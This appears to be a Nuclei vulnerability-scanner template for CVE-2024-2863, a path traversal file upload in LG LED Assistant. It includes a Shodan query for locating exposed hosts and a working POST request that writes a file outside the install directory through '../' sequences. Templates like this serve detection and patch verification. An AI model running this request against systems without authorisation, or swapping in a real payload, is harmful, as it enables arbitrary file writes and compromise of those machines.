漏洞描述
A path traversal vulnerability exists in the endpoint handler for /api/thumbnail in Common.js. An unauthenticated remote attacker can exploit this to upload arbitrary files to any location on the disk drive where the product is installed.
id: CVE-2024-2863
info:
name: LG LED Assistant - Thumbnail Path Traversal File Upload
author: beginee
severity: high
description: |
A path traversal vulnerability exists in the endpoint handler for /api/thumbnail in Common.js. An unauthenticated remote attacker can exploit this to upload arbitrary files to any location on the disk drive where the product is installed.
reference:
- https://www.tenable.com/security/research/tra-2024-08
- https://nvd.nist.gov/vuln/detail/CVE-2024-2863
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-2863
cwe-id: CWE-22
epss-score: 0.67129
epss-percentile: 0.98494
metadata:
verified: true
max-request: 1
shodan-query: 'http.title:"LG LED Assistant" OR http.title:"LED Assistant"'
tags: cve,cve2024,lg,lfi,file-upload,thumbnail,traversal
variables:
target_filename: "/../../../../../../Users/Public/poc_test.txt"
target_fileStr: "bWFsaWNpb3VzIGNvbnRlbnQ%3d"
http:
- raw:
- |
POST /api/thumbnail HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
fileName={{target_filename}}&fileStr={{target_fileStr}}
matchers:
- type: dsl
dsl:
- 'contains(body, "{\"resCode\":\"SUCCESS\"}")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100d167386e15dc8618582fe47f2d3e5a526199a03ff0beeea94befcdcd306690c602202be5db1e6b22475dfcb61779a52b42e71011920329ea2615aa91284d7ba365c8:922c64590222798bb761d5b6d8e72950